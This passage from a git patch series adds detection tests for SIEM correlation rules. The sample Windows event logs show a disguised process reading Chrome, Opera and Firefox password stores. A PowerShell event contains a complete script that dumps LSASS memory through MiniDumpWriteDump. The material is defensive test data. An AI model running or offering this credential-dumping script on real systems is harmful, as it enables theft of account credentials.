a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc new file mode 100644 index 00000000..5473a193 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:29:07.076Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "4a7b9e8d-94c2-44ac-8d9d-949bc09eb63a"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "read", "alert.context": "iewin7\\ieuser read 'c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data' on iewin7", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc new file mode 100644 index 00000000..61caf538 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc @@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:31:15.3550630Z\"},\"EventRecordID\":\"4988\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"68\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Opera Software\\\\Opera Stable\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:31:15.355Z", "type": "raw", "uuid": "eda762de-8d4c-48c4-b2ef-5d83de983989"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:05.3081880Z\"},\"EventRecordID\":\"4989\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\key4.db\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\key4.db", "object.name": "key4.db", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:05.308Z", "type": "raw", "uuid": "98dd326b-88cf-48b9-8ba1-513fcee3c845"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "66323e2c-df36-488d-8914-e739970cd231"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "bed7249b-e9ad-4925-ac6d-1dfa9cf3582e"} + +expect 4 {"action": "read", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "medium", "object": "file", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file From b14976a964c7d234605ac41cbf69986b172337bf Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 13:46:20 +0300 Subject: [PATCH 04/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Credentials=5FMiniDumpWriteDump=5FLsass)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc index 744c83fd..31731af3 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc @@ -1,4 +1,4 @@ {"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2020-06-30T14:24:08.2546050Z\"},\"EventRecordID\":\"971\",\"Correlation\":{\"ActivityID\":\"{4aa5eae3-4f33-0001-3a2b-a64a334fd601}\"},\"Execution\":{\"ProcessID\":\"7008\",\"ThreadID\":\"6488\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"}},\"EventData\":{\"Data\":[{\"Name\":\"MessageNumber\",\"text\":\"1\"},{\"Name\":\"MessageTotal\",\"text\":\"1\"},{\"Name\":\"ScriptBlockText\",\"text\":\"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \\\"$($ProcessName).dmp\\\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \\\"$($Exception.Message) ($($ProcessName):$($ProcessId))\\\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \\\"Memdump complete!\\\" } }\"},{\"Name\":\"ScriptBlockId\",\"text\":\"27f08bda-c330-419f-b83b-eb5c0f699930\"},{\"Name\":\"Path\",\"text\":\"C:\\\\Users\\\\Public\\\\lsass_wer_ps.ps1\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.fullpath": "C:\\Users\\Public\\lsass_wer_ps.ps1", "object.id": "27f08bda-c330-419f-b83b-eb5c0f699930", "object.name": "lsass_wer_ps.ps1", "object.path": "C:\\Users\\Public\\", "object.process.cmdline": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "object.process.id": "7008", "object.value": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T09:58:08.329Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-06-30T14:24:08.254Z", "type": "raw", "uuid": "7cced0b4-cdac-49c8-aaa6-5ea771e45623"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Credentials_MiniDumpWriteDump_Lsass"} \ No newline at end of file +expect 1 {"action": "execute", "alert.context": "function memory($path) { $process = get-process lsass $dumpfilepath = $path $wer = [psobject].assembly.gettype('system.management.automation.windowserrorreporting') $wernativemethods = $wer.getnestedtype('nativemethods', 'nonpublic') $flags = [reflection.bindingflags] 'nonpublic, static' $minidumpwritedump = $wernativemethods.getmethod('minidumpwritedump', $flags) $minidumpwithfullmemory = [uint32] 2 # $processid = $process.id $processname = $process.name $processhandle = $process.handle $processfilename = \"$($processname).dmp\" $processdumppath = join-path $dumpfilepath $processfilename $filestream = new-object io.filestream($processdumppath, [io.filemode]::create) $result = $minidumpwritedump.invoke($null, @($processhandle, $processid, $filestream.safefilehandle, $minidumpwithfullmemory, [intptr]::zero, [intptr]::zero, [intptr]::zero)) $filestream.close() if (-not $result) { $exception = new-object componentmodel.win32exception $exceptionmessage = \"$($exception.message) ($($processname):$($processid))\" # remove any partially written dump files. for example, a partial dump will be written # in the case when 32-bit powershell tries to dump a 64-bit process. remove-item $processdumppath -erroraction silentlycontinue throw $exceptionmessage } else { \"memdump complete!\" } }", "alert.key": "function memory($path) { $process = get-process lsass $dumpfilepath = $path $wer = [psobject].assembly.gettype('system.management.automation.windowserrorreporting') $wernativemethods = $wer.getnestedtype('nativemethods', 'nonpublic') $flags = [reflection.bindingflags] 'nonpublic, static' $minidumpwritedump = $wernativemethods.getmethod('minidumpwritedump', $flags) $minidumpwithfullmemory = [uint32] 2 # $processid = $process.id $processname = $process.name $processhandle = $process.handle $processfilename = \"$($processname).dmp\" $processdumppath = join-path $dumpfilepath $processfilename $filestream = new-object io.filestream($processdumppath, [io.filemode]::create) $result = $minidumpwritedump.invoke($null, @($processhandle, $processid, $filestream.safefilehandle, $minidumpwithfullmemory, [intptr]::zero, [intptr]::zero, [intptr]::zero)) $filestream.close() if (-not $result) { $exception = new-object componentmodel.win32exception $exceptionmessage = \"$($exception.message) ($($processname):$($processid))\" # remove any partially written dump 